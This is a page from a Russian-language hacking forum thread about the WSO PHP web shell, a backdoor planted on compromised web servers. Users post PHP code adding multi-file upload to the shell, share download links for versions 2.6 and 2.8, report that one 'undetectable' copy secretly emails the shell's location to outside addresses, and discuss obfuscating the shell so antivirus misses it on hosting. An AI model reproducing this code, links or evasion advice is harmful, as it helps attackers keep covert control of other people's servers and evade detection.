HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Избранное
Перезагрузить страницу WSO (веб-шелл)
   
Ответ
Страница 44 из 58 « Первая < 34 40 41 42 43 44 45 46 47 48 54 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #431  
Старый 23.04.2015, 16:25
xavior
Guest
Сообщений: n/a
Провел на форуме:
198

Репутация: 1
По умолчанию
Делаем мультиаплоад в шелле. Выложил на Rdot, дублирую также сюда:





Правим input аплоада

Код HTML:
HTML:
Upload file:$is_writable
>'>
Далее строка примерно 522

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#DD0000"]'uploadFile'[/COLOR][COLOR="#007700"]:
...
.....
break;[/COLOR][/COLOR
Заменяем там блок на

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#DD0000"]'uploadFile'[/COLOR][COLOR="#007700"]:
 if ([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]) ) {
 foreach ([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$tmpName[/COLOR][COLOR="#007700"]) {
 if(!@[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmpName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]])) {
 echo[/COLOR][COLOR="#DD0000"]"Can't upload file!"[/COLOR][COLOR="#007700"];
 }
 }
 }
 break;[/COLOR][/COLOR
 
Ответить с цитированием

  #432  
Старый 10.05.2015, 23:47
Maser_Montan
Guest
Сообщений: n/a
Провел на форуме:
3313

Репутация: 0
По умолчанию
Некий WSO 2.6 кому сильно надо.

http://pastebin.com/Xneg3zJu
 
Ответить с цитированием

  #433  
Старый 11.05.2015, 06:27
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от Maser_Montan  
Maser_Montan said:

Некий WSO 2.6 кому сильно надо.
http://pastebin.com/Xneg3zJu
написали бы в чем отличия
 
Ответить с цитированием

  #434  
Старый 21.05.2015, 21:38
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию
в присутствии бэкдора, пологаю
 
Ответить с цитированием

  #435  
Старый 09.07.2015, 20:43
6agupa
Guest
Сообщений: n/a
Провел на форуме:
9392

Репутация: 0
По умолчанию
https://code.google.com/p/wso-web-shell-2-8/

Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.

А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.

Или это противоречит политике GitHub?
 
Ответить с цитированием

  #436  
Старый 09.07.2015, 22:07
H@rd
Guest
Сообщений: n/a
Провел на форуме:
10388

Репутация: 1
По умолчанию
Цитата:
Сообщение от 6agupa  
6agupa said:

https://code.google.com/p/wso-web-shell-2-8/
Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.
А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.
Или это противоречит политике GitHub?
Запустил WSO2.8_undetectable.php на локалхосте с SMTP-заглушкой.

Скриптом отправляется 2 письма на следующие адреса:

fwrite@live.ca, f3d0s3rv3r@hotmail.com

.SpoilerTarget" type="button">Spoiler: Письмо 1
X-Sendmail-Cmdline: sendmail.pl -t -i

To: fwrite@live.ca

Subject: array localhost/WSO2.8_undetectable.php

X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code

localhost/WSO2.8_undetectable.php

.SpoilerTarget" type="button">Spoiler: Письмо 2
X-Sendmail-Cmdline: sendmail.pl -t -i

To: f3d0s3rv3r@hotmail.com

Subject: WebShell http://localhost/WSO2.8_undetectable.php by 127.0.0.1

X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code(276) : eval()'d code(1) : eval()'d code

Bug: localhost/WSO2.8_undetectable.php by 127.0.0.1
 
Ответить с цитированием

  #437  
Старый 13.07.2015, 12:00
6agupa
Guest
Сообщений: n/a
Провел на форуме:
9392

Репутация: 0
По умолчанию
Кто-нибудь вообще криптует/минифицирует/обфусцирует WSO2?

Есть в этом смысл вообще? Или современные антивирусы имеют интерпретатор PHP?
 
Ответить с цитированием

  #438  
Старый 13.07.2015, 14:42
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Смысл имеет! У меня к примеру сейчас, есть вариант который не один ав не палит, что позволяет дольше быть незамеченным на хостинге. ручками все делал, хочу свой оббусификатор написать но ручки пока не доходят, вариант на 50% сырой еще.
 
Ответить с цитированием

  #439  
Старый 19.07.2015, 20:18
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от I_I  
I_I said:

https://github.com/HARDLINUX/webshell
Новый WebShell 2015 года, если кто шарит помогайте улучшать

И что же ты изменил? Испортил дизайн и добавил бесполезную ***ню?
 
Ответить с цитированием

  #440  
Старый 19.07.2015, 20:23
3ran
Guest
Сообщений: n/a
Провел на форуме:
7728

Репутация: 5
По умолчанию
Цитата:
Сообщение от I_I  
I_I said:

https://github.com/HARDLINUX/webshell
Новый WebShell 2015 года, если кто шарит помогайте улучшать

Сделай описание что нового ты добавил в эту версию.
 
Ответить с цитированием
Ответ
Страница 44 из 58 « Первая < 34 40 41 42 43 44 45 46 47 48 54 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета. SK | Heaton Мировые новости. Обсуждения. 5 13.06.2007 02:07
Переделанный шелл! k1b0rg PHP 33 03.04.2007 08:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ